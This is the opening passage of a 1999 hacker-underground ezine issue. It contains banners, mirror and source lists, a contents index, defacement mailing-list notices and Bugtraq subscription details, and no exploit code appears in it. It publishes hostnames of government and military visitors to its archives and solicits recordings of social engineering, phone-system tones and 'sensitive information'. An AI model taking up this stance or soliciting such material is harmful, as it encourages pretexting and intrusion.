Copy Link
Add to Bookmark
Report
hwa-hn45
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99/2000=] Number 45 Volume 1 1999 Dec 5th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"This newsletter/ezine has been Declassified for the phearing impaired"
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #45 covering Nov 28th to Dec 5th.
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Mailing list members: 447 Can we bump this up somewhat? spread the word!
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _
| | | | ___ | |_
| |_| |/ _ \| __|
| _ | (_) | |_
|_| |_|\___/ \__|
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
.gov and .mil activity
proxy.gintic.gov.sg
doegate.doe.gov
sunspot.gsfc.nasa.gov
gate1.mcbh.usmc.mil
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
mc1926.mcclellan.af.mil
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good Is It Worth It Followup to see
our boys keeping up with the news... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ ___ ___ _ ___
| | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____
| |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
| _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \
|_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ _ _ _ _____ _ _ _
| | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___
| |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __|
| _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__
|_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___|
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_____ _ _ _
| ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _
| |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
| _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| |
|_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
|___/
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
BTW if anyone can suggest a better editor than UEDIT for
this thing send me some email i'm finding it lacking in
certain areas. Must be able to produce standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
__ __ _
| \/ (_)_ __ _ __ ___ _ __ ___
| |\/| | | '__| '__/ _ \| '__/ __|
| | | | | | | | | (_) | | \__ \
|_| |_|_|_| |_| \___/|_| |___/
New mirror sites
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***
http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
*** Most likely to be up to date other than the main site.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #44
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
**************************************************************************
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on from the zine and around ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Yes It Is (Worth It) ............................................
04.0 .. ExplorerZip Shrinks, Becomes MiniZip ............................
05.0 .. Staples Files Suit Against Unknown Defacer ......................
06.0 .. Comet bows to consumer pressure..................................
07.0 .. Personal Info of Canadian ISP Users Leaked ......................
08.0 .. First Internet Piracy Case in Japan .............................
09.0 .. FBI Launches InfraGuard in Ohio .................................
10.0 .. National Gun Database Goes Online ...............................
11.0 .. Zero Knowledge Ships Freedom, Finally ...........................
12.0 .. OpenBSD 2.6 Ships ...............................................
13.0 .. Videon Was Warned of Data Loss ..................................
14.0 .. German Digital Signature Chip Broke .............................
15.0 .. IETF Members Under Investigation For Treason ....................
16.0 .. Jane's Releases Cyberterrorism Report ...........................
17.0 .. Car Radio Listening Habits Being Gathered .......................
18.0 .. CVE by Mitre Goes Online ........................................
19.0 .. Novell Head Victim of Online Credit Card Theft ..................
20.0 .. IDC Says E-Commerce Unsafe Most of the Time .....................
21.0 .. Attack Trees Help to Model Security Threats .....................
22.0 .. Pandora Updated .................................................
23.0 .. [sSh] Busted or Not? ...........................................
24.0 .. Response to Freedom Extraordinary ...............................
25.0 .. DCypher.net Team Created ........................................
26.0 .. Hackers Make it to Mars .........................................
27.0 .. Security Focus newsletter #17....................................
28.0 .. SQL 7 "Magic Packet" DoS.........................................
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
____
/ ___| ___ _ _ _ __ ___ ___ ___
\___ \ / _ \| | | | '__/ __/ _ Y __|
___) | (_) | |_| | | | (_| __|__ \
|____/ \___/ \__,_|_| \___\___|___/
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ s
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _ _
/ ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___
\___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
|____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html
--
defaced [web page defacement announce list]
This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.
There will be two types of posts to this list:
1. brief announcements as we learn of a web defacement.
this will include the site, date, and who signed the
hack. we will also include a URL of a mirror of the hack.
2. at the end of the day, a summary will be posted
of all the hacks of the day. these can be found
on the mirror site listed under 'relevant links'
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
(1) It is low volume on a normal day. On days of many defacements,
traffic may be increased. On a few days, it is a virtual mail
flood. You have been warned. ;)
-=-
--
defaced summary [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.
There will be ONE type of post to this list:
1. a single nightly piece of mail listing all reported
domains. the same information can be found on
http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
defaced GM [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm"
in the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
--
defaced alpha [web page defacement announce list]
This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the information
will only include domain names. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.
To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
